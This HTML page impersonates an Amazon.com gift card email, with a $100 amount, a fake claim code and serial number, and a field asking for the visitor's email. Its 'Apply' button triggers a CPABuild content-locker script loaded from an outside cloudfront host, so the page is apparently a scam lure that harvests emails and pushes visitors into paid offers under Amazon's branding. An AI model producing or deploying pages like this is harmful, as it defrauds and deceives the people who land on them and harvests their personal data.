<!DOCTYPE html>

<html>
<head>
  <meta name=viewport content="width=device-width, initial-scale=1"/>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  
<meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  
  <link rel="stylesheet" href="styles/style.css"/>
  
  
  <title>Amazon.com Gift Card</title>
</head>
<body style="padding: 0; margin: 0; font-family:Arial,Helvetica,sans-serif">
  <div style="display:none !important;
           visibility:hidden;
           mso-hide:all;
           font-size:1px;
           color:#ffffff;
           line-height:1px;
           max-height:0px;
           max-width:0px;
           opacity:0;
           overflow:hidden;">Hope you enjoy this Amazon Gift Card! </div>
  <div style="display:none !important;
           visibility:hidden;
           mso-hide:all;
           font-size:1px;
           color:#ffffff;
           line-height:1px;
           max-height:0px;
           max-width:0px;
           opacity:0;
           overflow:hidden;">Apply to your Amazon account to use on millions of items.</div>
  
     
  <!-- Wrapper table for background color -->
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td width="100%" bgcolor="f3f3f3" style="font-size:12px; font-family:Arial,Helvetica,sans-serif; color:#666666; line-height:1.2em;">
    
    <!-- Top area text -->
    <table style="border-collapse: separate; border-spacing: 10px; margin-left: auto; margin-right: auto;" border="0" align="center" cellpadding="30" cellspacing="0">
      <tr>   
        <td align="center" valign="middle" style="width: 500px; padding-top:50px;"><img id="alogo" width="100" src="https://images-na.ssl-images-amazon.com/images/G/01/gc/formation/assets/amazon_logo_color_135x42._CB280672829_.png"/></td>
      </tr>
    </table>

    <!-- Main section table manages the drop shadow -->
    <table bgcolor="f3f3f3" class="full-width-table" border="0" align="center" cellpadding="0" cellspacing="0" style="padding: 0; width: 500px; margin-left: auto; margin-right: auto;">
      <tr>
        <td>
          <!-- Inner table holds design image, claim code buttons and personal message -->
            <table border="0" bgcolor="ffffff" align="center" cellpadding="0" cellspacing="0" style="padding: 0; margin: 0; border-radius: 4px; -webkit-border-radius: 4px; -moz-border-radius: 4px; -moz-box-shadow:0px 1px 3px #cacaca !important; -webkit-box-shadow:0px 1px 3px #cacaca !important; box-shadow:0px 1px 3px #cacaca !important; border-collapse:separate !important;">
              <tr>
                <td align="center" style="line-height:0 !important;"><a href="#">
                  <img src="https://images-na.ssl-images-amazon.com/images/G/01/gc/formation/assets/B01M1NQ1CED._CB277310599_.png" alt="Amazon.com Gift Card" border="0" align="center" style="width: 100%; display:block; border-radius: 4px 4px 0 0; -webkit-border-radius: 4px 4px 0 0; -moz-border-radius: 4px 4px 0 0; " id="mainImage"/>
                    </a></td>
              </tr>
              <tr>
                <td style="border-bottom: 1px solid #eee;">
                  <table width="100%" cellspacing="30" cellpadding="0" style="padding: 0; border-collapse: separate; border-spacing: 30px;">
                    <tr><td>
                      <p class="gc-message" style="font-family: Georgia, serif; font-size:20px; color:#333; line-height:32px; margin: 0; padding: 0;">Hope you enjoy this Amazon Gift Card!</p>
                      
                      
                      
                      
<br>                    
<form>
  <div class="email">
    <label for="email"></label>
    
<input type="email" name="email" id="email" placeholder="Your Email" required>
    
  </div>
</form>
                      
                      
                          
    </td></tr>
     </table>
      </td>
      </tr>
       <tr>
       <td>
       <table width="100%" cellpadding="0" cellspacing="30" style="padding-bottom: 0 !important; border-collapse: separate; border-spacing: 30px;">
                    <tr>
                      <td width="70%" valign="middle" style="font-size:40px; font-family:Arial,Helvetica,sans-serif; color:#333;">
                        <table cellpadding="0" cellspacing="0" width="100%">
                          <tr><td height="35" valign="middle" align="left">
                            <span class="amount" style="font-family: Arial,Helvetica,sans-serif; font-weight: bold; line-height: 28px; font-size:28px;">$100</span>
                          </td></tr>
                          <tr><td valign="middle" align="left">
                            <span class="no-style" style="vertical-align: text-top; font-size:18px; font-family:Arial,Helvetica,sans-serif; color:#888; text-decoration: none;"><span style="text-decoration: none; color: inherit;">Amazon.com</span> Gift Card</span>
                          </td></tr>
                        </table>
                      </td>
                      <td width="30%" align="right" valign="middle">
                        <img id="footLogo" src="https://images-na.ssl-images-amazon.com/images/G/01/gc/formation/assets/smile._CB284583314_.png"/>
                      </td>
                    </tr>
                  </table>
              </tr>
            </table>
          <!-- End inner table -->
        </td>
      </tr>
    </table>
    <!-- End main section table -->

    <!-- Bottom area text -->
    <table class="full-width-table" border="0" align="center" cellspacing="30" style="margin-left: auto; margin-right: auto; width: 500px; border-spacing: 30px; border-collapse:separate;">
      <tr>
        
        <br>
        
        <button type="submit" value="Send" id="btn" class="submit" onclick="setTimeout(CPABuildLock, 5000);">Apply to your Amazon account</button>      
      
        
        
        
        <td style="" height="20" align="center" valign="middle" ><br/><a id="applyLink" href="#">
        
        <!--<img width="300" src="https://images-na.ssl-images-amazon.com/images/G/01/gc/formation/assets/us_apply._CB278630597_.png"/>-->
          
        </a>
                            
          <p style="font-size:13px; font-family:Arial,Helvetica,sans-serif; color:#666;">Don’t have an Amazon account?<br/><a href="#" style="color: #0066c0;">Sign-up</a> to redeem.</p></td>
      </tr>
    </table>

    <!-- Bottom Info -->
    <table style="font-size:12px; font-family:Arial,Helvetica,sans-serif; color:#666666; line-height:1.2em; border-spacing: 30px; border-collapse:separate;" bgcolor="444444" width="100%" border="0" align="center" cellpadding="10" cellspacing="0">
      <tr>
        <td>
          <table class="full-width-table" style="margin-left: auto; margin-right: auto; width: 500px;" width="500px" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr><td height="36" colspan="3">&nbsp;</td></tr>
            <tr>
              <td width="50">&nbsp;</td>
              <td width="400" style="font-size: 14px; border: 2px solid; color: #c9c9c9; " align="center">
                <table style="border-collapse: separate; border-spacing: 10px;" cellpadding="10" width="100%">
                <tr><td align="center"><span class="claim-code" style="font-size:12px; font-family:Arial,Helvetica,sans-serif; color:#999999; line-height:1.2em;">Claim Code:<span style="margin-left:3px;"><img border="0" width="0" height="0" src="http://fls-na.amazon.com/1/gc-core/1/OP/gc?sn=1540448622325144&lf=EFGA" marginwidth="0" alt="" style="visibility:hidden">SMLS-DVS650-6500</span></span></td></tr>
                </table>
              </td>
              <td width="50">&nbsp;</td>
            </tr>
            <tr><td>&nbsp;</td></tr>
            <tr>
              <td colspan="3" style="font-family:Arial,Helvetica,sans-serif; color:#c9c9c9; font-size:13px; line-height: 19px;"><p>Once applied to your Amazon account, the entire amount will be added to your gift card balance. Your gift card balance can’t be transferred to other accounts, used to buy other gift cards, or, except as required by law, redeemed for cash.</p>
<p>Your gift card balance will be applied automatically to eligible orders during the checkout process or with the <span style=“text-decoration: none !important; color: inherit !important;”>Amazon.com</span> 1-Click® service. If you don’t want use your gift card balance on your order, you can unselect it as a payment method in checkout.</p>
<p>If you experience any issues using your gift card, you can reference your gift card by providing the following information to customer service:</p>
<p>Serial Number: 650005000650<br/>
Order Number: 659-6500500-650050</p></td>
            </tr>
            <tr><td height="36" colspan="3">&nbsp;</td></tr>
          </table>
        </td>
      </tr>
    </table>
    <!-- End bottom info-->

    <!-- Bottom ToC Section -->
    <table width="100%" border="0" align="center" cellpadding="10" cellspacing="0">
      <tr>
        <td>
          <table style="margin-left: auto; margin-right: auto;" class="full-width-table" width="500px" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td style="font-family:Arial,Helvetica,sans-serif; font-size: 11px; color: #666;" align="center">Sold by ACI Gift Cards LLC., an Amazon company. View <a href="https://www.amazon.com/gp/f.html?C=BO2ZZ2TZDRG8&M=urn:rtn:msg:20180717225635965cd5d4d7b14a7d92f89c00ec60p0na&R=1GFGUU92PES2Y&T=C&U=https%3A%2F%2Fwww.amazon.com%2Fgp%2Fhelp%2Fcustomer%2Fdisplay.html%253FnodeId%3D3122091%26app-nav-type%3Dmodal%3Fref_%3Dpe_1870990_140900700&H=ER1JAD1PCL201MSCCIFTAFR6WWQA&ref_=pe_1870990_140900700">Terms and Conditions</a>.</td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
    <!-- End Bottom ToC Section -->
  </td></tr></table>
    
        
</body>
</html>
  
  <script type="text/javascript">    
    var CPABUILDSETTINGS={"it":3564237,"key":"ed428"};
</script>
<script src="https://d2bb5k76l7oivo.cloudfront.net/f2684fa.js"></script>